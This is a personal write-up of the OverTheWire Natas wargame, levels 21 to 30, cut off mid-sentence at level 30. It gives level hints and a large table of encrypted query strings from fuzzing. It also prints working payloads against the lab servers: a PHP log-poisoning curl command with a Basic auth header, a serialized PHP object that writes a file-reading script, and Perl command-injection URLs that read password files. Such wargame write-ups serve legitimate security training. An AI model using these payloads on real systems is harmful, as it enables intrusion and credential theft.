Overthewire : Natas : 21 - 34
22 September, 2020
A brief writeup of solving the Overthewire War Game Natas, levels 21 through 34
20 ➜ 21
- Use
?debugand observe the code - A particular part of the session cookie is is dependent on your input
- The input is not sanitized, but it is read line by line and checked for a particular flag.
- Craft the necessary input and the password will show itself...
21 ➜ 22
- No input validation again
- Manipulate the session on one website and the other gives you the password
22 ➜ 23
- Browsers are too obedient, what with the Location header they obey...
23 ➜ 24
- PHP's documentation will point out some interesting insights into string comparison.
- A specially crafted input will get you the password
24 ➜ 25
strcmpdoesn't always speak the truth
25 ➜ 26
- Check the language files by constructing a path from the source code.
- There is only one file being written to and that too with unsanitized input
- Write PHP to that file and open it as a language file
curl 'http://natas25.natas.labs.overthewire.org/?lang=../.../...//logs/natas25_371iikrbf5bpk6eouu6a48tvb2.log' -H 'Authorization: Basic bmF0YXMyNTpHSEY2WDdZd0FDYVlZc3NIVlkwNWNGcTgzaFJrdGw0Yw==' -H 'Cookie: PHPSESSID=371iikrbf5bpk6eouu6a48tvb2' -H 'HTTP_USER_AGENT: <?php global $__FOOTER; $__FOOTER=file_get_contents("/etc/natas_webpass/natas26"); ?>'
26 ➜ 27
- Image operations are a distraction
- Focus on something that you can input directly to the program
- Logger object is writing to files
- Some encoded code will get you the answer
<!DOCTYPE html> <html> <body> <?php class Logger{ private $logFile; private $initMsg; private $exitMsg; function __construct(){ $this->initMsg="echo"; $this->exitMsg="<?php print file_get_contents('/etc/natas_webpass/natas27'); ?>\n"; $this->logFile="/var/www/natas/natas26/img/temp.php"; } } $logger = new Logger(); print base64_encode(serialize($logger)); ?> </body> </html> - I didn't get this in the first try, had to dig around the interwebs for some hints
27 ➜ 28
- Turns out there's a bug in MySQL that ignores trailing whitespace applied to a filter using WHERE clause
- If you try to cross the max length of a field with a sparse string, the string is truncated however the white spaces are not removed.
- Create a new user 'natas28<spaces>xyz' with a password
- Now the WHERE query would answer with two natas28 because of the bug
- Now send natas28 with an empty password and
dumpDatawill give away the password
28 ➜ 29
- Try searching something and observe the query, looks to be some kind of encrypted form of the query string
- Try removing a few characters and you'll see an error
- Googling that error gives a hint, this could be an AES encrypted string
- Try fuzzing the query with different inputs of different lengths, different characters
length | encrypted query\n
0 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLof/YMma1yzL2UfjQXqQEop36O0aq+C10FxP/mrBQjq0eOsaH+JhosbBUGEQmz/to=
1 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKriAqPE2++uYlniRMkobB1vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
2 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKxMKUxvsiccFITv6XJZnrHSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
3 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIvUpOmOsuf6Me06CS3bWodmi4rXbbzHxmhT3Vnjq2qkEJJuT5N6gkJR5mVucRLNRo=
4 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPI1BKmpZ1/9YUtPH5DShPyqKSh/PMVHnhLmbzHIY7GAR1bVcy3Ix3D2Q5cVi8F6bmY=
5 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLDah8EaRWKMFIWYUal4/LsrDuHHBxEg4a0XNNtno9y9GVRSbu6ISPYnZVBfqJ/Ons=
6 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJKEf/nOv0V2qBes8NIbc3hQcCYxLrNxe2TV1ZOUQXdfmTQ3MhoJTaSrfy9N5bRv4o=
7 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKf3hzvbj+EoXJjPzB0/I4YZIaVSupG+5Ppq4WEW09L0Nf/K3JUU/wpRwHlH118D44=
8 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJFPgAgYC9NzNUPDrdwlHfCiW3pCIT4YQixZ/i0rqXXY5FyMgUUg+aORY/QZhZ7MKM=
9 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKeYiaGpSZAWVcGCZq8sFK7oJUi8wHPnTascCPxZZSMWpc5zZBSL6eob5V3O1b5+MA=
10 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6Oec4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI=
11 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OetO2gh9PAvqK+3BthQLni68qM9OYQkTq645oGdhkgSlo=
12 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OezoKpVTtluBKA+2078pAPR3X9UET9Bj0m9rt/c0tByJk=
13 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OeH3RxTXb8xdRkxqIh5u2Y5GIjoU2cQpG5h3WwP7xz1O3YrlHX2nGysIPZGaDXuIuY
14 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6Oe7NNvj9kWTUA1QORJcH0n5UJXo0PararywOOh1xzgPdF7e6ymVfKYoyHpDj96YNTY
15 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OeWu8qmX2iNj9yo/rTMtFzb6dz8xhQlKoBQI8fl9A304VnjFdz7MKPhw5PTrxsgHCk
16 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OeiSUVjPxawG0iv9oLcsjxUad+jtGqvgtdBcT/5qwUI6tHjrGh/iYaLGwVBhEJs/7a
17 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OerfihrQF37R7K06x8EIKqnr36EFTsaFFc+W8qVURZGUeQT0sqvywtdoaqcqUxUclw
18 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OeU9lJnrytaGHwS3zcJPMEYkh5mgex0ptZggFck1XC4A6t7ZvbrKanO3GzWgENLExX
19 =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OepUn9pSttm04mMtsxg4hW1ZouK1228x8ZoU91Z46tqpBCSbk+TeoJCUeZlbnESzUa
- Empty query gives a random set of jokes every time
- For each of string.ascii_letters
a =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKriAqPE2++uYlniRMkobB1vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
b =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIYiwNnSJY7KHJGU+XjuMzVvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
c =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKEMZKNASy09t5ooTNAbaX0vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
d =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKnMw6aSOWjayIcOCUAu7bVvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
e =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIeoxGWFgXHXykQlH86OpiMvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
f =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKX9Nbu3XXL5PIaYqiW14GSvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
g =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLV4wF7G0i3DftMhPsAyZVqvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
h =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIJJW40OKGV9h7fJBqf28f9vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
i =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLMEPlGOfuQ7a1fFtCB5a1XvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
j =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPICgQ0oynl6FWbVHY/8dJkIvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
k =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLnuAD+NGYcU1yTMgoFGDHHvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
l =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIskS5tRSHzosjTBciCi/8VvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
m =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJTwbPiFdKuTtoify+YlBFLvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
n =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKvKlZ1HHFG9tUyBWOMONORvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
o =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIPdJbPB4AWVinSFPLRB1eYvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
p =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKD30n5dTLLZ3c/Rs9/bQwwvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
q =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKghh12LRBJ55334nG5LgfxvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
r =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKef8vfXgzqiOnKBXb2kd2cvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
s =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPI+jVOKpzBAHVGo0XIzCijxvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
t =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKLbhtgC4p7C+91shiGBL15vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
u =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIRwoUdFyCT68E7RwSyaxRSvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
v =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIae8xMT+8hwEi33FOpyUlmvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
w =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKlwoXvDTqKtYfcUSRUbdOSvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
x =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJXwBmXBeBRhwrvq1HTCwh/vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
y =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPL7EnsTc1X3234z1DMqyjsMvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
z =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJDB5EyzqNqQNuIYdASJqV6vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
A =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKjd8MKDZZIiKG51FNeoPjUvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
B =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJjS9S3adXJc/WWvI3XdcvzvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
C =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIV6guc0zYmhS2FK2WeDX9XvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
D =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJPZL/HuhXFCvKgIB2/Zln5vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
E =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJibK/FTJvyvXqxFb51bhV1vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
F =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJhFsli4K/fPeKT4M8Ry23kvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
G =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKOKpwR3/gkTIMH8U7dhu4GvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
H =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKIDMQGG2abZtjOsSZs1X39vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
I =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKOvt9wFI9mjTVoT/tGtl7FvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
J =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPL5KLXni7y8eqJFwXWh1DUnvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
K =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPITdJXBsJQLwvXAvasuKjoevfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
L =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPI2LEeQPtPKos7Cg24MI6rXvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
M =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIFr55FtnKO9tEyQa/+96tovfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
N =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKQYCy/DcTbyaMyrOKXW+nmvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
O =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJXWuUtLaAhQY1GD/2pLpWBvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
P =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJslle8BYSivKdpv1B2Y01FvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
Q =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJaGM8iPTFRQd0Zmcxed5mevfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
R =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJiDv3VFbwCsAwUlLNbD2BFvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
S =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJ3Nmyh1ZS++nAIX1FELIkMvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
T =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJO9/z7rq/TbEgCDg6ebTA6vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
U =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJs9IckNOkzgew37TadMpVqvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
V =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJHdksLJFuUJ3MlCTPRoS7rvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
W =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLxGu5bRS4vnVo0bm1VgVobvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
X =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPI3GgIRwkWmfdd+oEfVBISnvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
Y =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPK6wkS+fLmU8WdWdeOrvNlhvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
Z =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLPP49oqlQoQMK4BitKnvvEvfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=
- For each of string.ascii_letters with a fixed length of 2. Indicates that the suffix could be the input length.
aa =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKxMKUxvsiccFITv6XJZnrHSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
bb =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLKBNKdq9/0x+evkK8KHLy7SHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
cc =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJwdXah4OqsnvfitQ5gN7WnSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
dd =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKWT0U0okLYlqhbTKYuLt+ISHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
ee =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLPLIcrsAhkEWWisqIVS+q1SHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
ff =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLG2tpRa/lJxUOBFDOEgHpGSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
gg =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIlFN9yuJB+oVSW9+VFGJXySHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
hh =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJ1RmBvYLhxP871DO05ne6DSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
ii =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPItyGsQbUFGl9jXWBGvNw1BSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
jj =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLxlDgbBtilPm1QGg5dFbZCSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
kk =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLwsqVmmi5I5np2SaklrXxeSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
ll =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIIBE7iZ3vZxsO6StURlmOLSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
mm =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPI47Stm71Vg6QNrWXeiuzbfSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
nn =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKVNX2eLkHmB99ZqyBOgLKrSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
oo =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPL4oG84pYD3udfMaXjUnGNlSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
pp =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJrPHrPDFwX+zfO7iT8WRhRSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
qq =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLTgL+HwCdm90sU1kujVHccSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
rr =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLWe50HTBinLy8LnliHzDKcSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
ss =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIi9jK6/hBGgtXoRbG6b+PmSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
tt =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIqWzrZ3Z5ZNlWvU39dkVtISHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
uu =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLXgsiTfXhm8oddI8DB/iVYSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
vv =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJGA6uFUEPp5S3PF+YNYmWNSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
ww =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPK6RcM9ya1lltF7XO7HFqi9SHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
xx =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJPWNuJ4+aBnGUW4PC1pprqSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
yy =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIZWsPRIbSixRaBl1HQPzR+SHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
zz =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJzXL3LnBBpRDdq8SV9BsfrSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
AA =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKYsNYgsg1hFJebd+JNix06SHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
BB =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPK+RstvUAvyxo4jqvzobaixSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
CC =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJ4p+qySribmtALhBwB4m2NSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
DD =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLDFqRQSZGc8WFg9W3jLa1hSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
EE =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPITH6P54LtKKbKRINEhqkFQSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
FF =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLYXRZpv3i/J6Pd8h5vfZRaSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
GG =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKxhziyWZt5jL7lr1COku8WSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
HH =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLPVbf90TZW6Js78DNWw+rLSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
II =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKNdpJ3uxFvz42RE9vCZWZfSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
JJ =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKjxtHLZKrBD41naOVnQaR2SHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
KK =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPI7p0WgLLSF08nnL0KQWqlSSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
LL =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIsrlEZjia3vp5FLdCpZEAySHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
MM =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJOaZT8s12S+AV44HCaaG8LSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
NN =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLNdxfLg3cm2nEOlx67EddASHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
OO =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKzbx/UnCR2VBliUYybX7FvSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
PP =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIYRTkxrVBAqYrWsFAqw2X7SHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
QQ =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKjjlqA/WQJykmE1+kpW/IWSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
RR =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIHX7YfF2rSlPXcbhDVw8IOSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
SS =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKzNLhMs+WHZ7pV747HBaHgSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
TT =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKv0jAApMI4dXk/YCiuHKvHSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
UU =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJssZAs11DbnBVbH8vMCB78SHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
VV =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPJkHXNSbRs7XtXQ9gqZl/h0SHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
WW =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLRcT+XTnwYNfizOG+A2eLBSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
XX =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIYeNqp0ZNyBFzSh8IVJyimSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
YY =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKyT4qzIZtID8NFJn5z+4oPSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
ZZ =G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIW1pqZkKlQVVy9ETs2A8TvSHmaB7HSm1mCAVyTVcLgDq3tm9uspqc7cbNaAQ0sTFc=
- I really couldn't figure out this level, but there a number of writeups available on the internet.
29 ➜ 30
- Something is perl-ish about this level
- Changing
filein the URL to the password didn't get me anywhere - The URL with one of the options selected looks like http://natas29.natas.labs.overthewire.org/index.pl?file=perl+underground+2
- Fuzzing the URL using CGIs gave a bunch of false positives
- Most likely using Perl's
opento open a file opencan be used to execute commands using "|". Try http://natas29.natas.labs.overthewire.org/index.pl?file=|echo%20%22hello%22- Trying various inputs, just a space at the end helped open the file index.pl, so can see the code now
- http://natas29.natas.labs.overthewire.org/index.pl?file=|cat%20index.pl%20
- As can be seen in the code, the input file name is suffixed with .txt, adding a space meant cat got two files as input, which works out for us
-
Can be tried on the commandline
$ perl -e 'print open my $s, "|cat test.pl .txt"; print $s;' test cat: .txt: No such file or directory 12970GLOB(0x55c4c5d494d8)%
-
- The code shows that input file name containing
natasis caught by the if condition - Luckily cat supports inputs with wildcard
- http://natas29.natas.labs.overthewire.org/index.pl?file=|cat%20/etc/nata*_webpass/nata*30%20%20
30 ➜ 31
- Looking at the source code, looked like a simple SQLi with a password input like
